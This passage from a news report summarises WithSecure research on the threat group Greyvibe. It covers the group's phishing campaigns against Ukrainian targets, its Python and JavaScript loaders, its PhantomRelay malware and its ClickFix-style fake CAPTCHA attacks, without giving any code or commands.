“While the activities align with Russian state interests, several observed indicators suggest the group has ties to the broader cybercrime ecosystem, with the group potentially involving current or former cybercriminal actors,” the WithSecure researchers said in their report.
Shifting attack vectors
Greyvibe’s first campaign was launched in August 2025, with a series of spear phishing emails that purported to come from Ukrainian officials and government agencies including the Kyiv City, the Main Directorate of the State Emergency, and the State Service of Special Communications and Information Protection.
The emails included links to ZIP and RAR archives, hosted on Google Drive and a service called 4sync, that contained malware loaders written in Python and JavaScript. The final payload was a custom malware program developed by the group that the WithSecure researchers dubbed PhantomRelay.
In another attack in October, the group experimented with ClickFix-style attacks on fake CloudFlare CAPTCHA pages. These attacks instructed users to open the Windows Run dialog and paste in malicious commands.
